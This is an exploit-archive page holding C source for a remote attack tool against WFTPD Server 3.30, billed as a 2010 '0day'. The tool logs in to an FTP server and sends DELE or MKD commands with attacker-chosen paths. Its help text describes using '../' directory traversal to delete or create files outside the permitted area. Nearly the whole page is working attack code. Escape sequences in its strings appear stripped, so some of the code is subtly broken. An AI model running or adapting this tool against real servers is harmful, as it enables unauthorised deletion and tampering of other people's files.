[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WFTPD Server 3.30 Multiple remote vulnerabilities(0day)
# Published : 2010-05-13
# Author : fl0 fl0w
# Previous Title : Safari 4.0.5 parent.close() Memory Corruption exploit (w/ASLR and DEP bypass)
# Next Title : miniwebsvr v0.0.10 Directory Traversal/Listing Exploits
#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<unistd.h>
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define POCNAME "[*]WFTPD 3.30 Multiple remote vulnerabilities(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef int i32;
typedef char i8;
typedef short i16;
enum {
True=1,
False=0,
Error=-1
};
struct {
i8 *USERx,
*PASSx,
*HOST;
i16 PORTx;
}def;
i8 *USER=0,*PASS=0,*dir=0,*host_addr=0,
sendbytes[250],recev[250];
i16 PORT=0,option;
i32 args(i32 argc,i8** argv){
i32 i;
argc--;
for(i=1;i<argc;i++){
switch(argv[i][1]){
case 'h':
host_addr=argv[++i];
break;
case 'u':
USER=argv[++i];
break;
case 'w':
PASS=argv[++i];
break;
case 'p':
PORT=atoi(argv[++i]);
break;
case 'o':
option=atoi(argv[++i]);
break;
default:{
printf("error with argument nr %d:(%s)n",i,argv[i]);
return Error;
exit(0);
}
}
}
// printf(" %sn %sn %sn %dn %dn %sn",host_addr,USER,PASS,PORT,option,argv[argc]);
return 1;
}
void bf_error(i8* B){
i32 e;
if(B==NULL)
e=0;
else
e=1;
}
void syntax(){
i8 *help[]={"t-h hostname",
"t-u Username",
"t-w watchword(password)",
"t-p port(default 21)",
"t-o option:",
"t 1 - delete folder,files",
"t 2 - make folder",
"t ../ move up 1 dir ../../ move up 2 dirs etc"
/*directory transversal*/
};
i32 i;
size_t com=sizeof help / sizeof help[0];
for(i=0;i<com;i++){
printf("%sn",help[i]);
}
}
void defaults(){
def.HOST="localhost";
def.PASSx="hacker";
def.USERx="anonymous";
def.PORTx=21;
//printf("%s %s %s %d",def.HOST,def.PASSx,def.USERx,def.PORTx);
}
i32 main(i32 argc,i8** argv){
if(argc<3){
printf("%sn%sn",POCNAME,AUTHOR);
printf("tToo few argumentsn syntax is:n");
syntax();
exit(0);
}
args(argc,argv);
i32 sok,
svcon,
sokaddr;
printf("[*]Starting n t...n");
struct sockaddr_in sockaddr_sok;
sokaddr = sizeof(sockaddr_sok);
sockaddr_sok.sin_family = AF_INET;
sockaddr_sok.sin_addr.s_addr = inet_addr(host_addr);
sockaddr_sok.sin_port = htons(PORT);
sok=socket(AF_INET,SOCK_STREAM,0);
if(sok==-1){
printf("[*]FAILED SOCKETn");
exit(0);
}
svcon=connect(sok,(struct sockaddr*)&sockaddr_sok,sokaddr);
i8 use[10];
if(svcon!=-1){
sprintf(sendbytes, "USER %srn",USER);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("User send errorn");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
sprintf(sendbytes, "PASS %srn",PASS);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Password send errorn");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
printf("%sn",recev);
}
sprintf(sendbytes, "SYSTrn");
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send errorn");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
if(option==1){
sprintf(sendbytes,"DELE %srn",argv[11]);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send errorn");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
}else if(option==2){
sprintf(sendbytes,"MKD %srn",argv[11]);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send errorn");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
}
}else printf("Connect errorn");
printf("[*]Exploit done!");
return 0;
}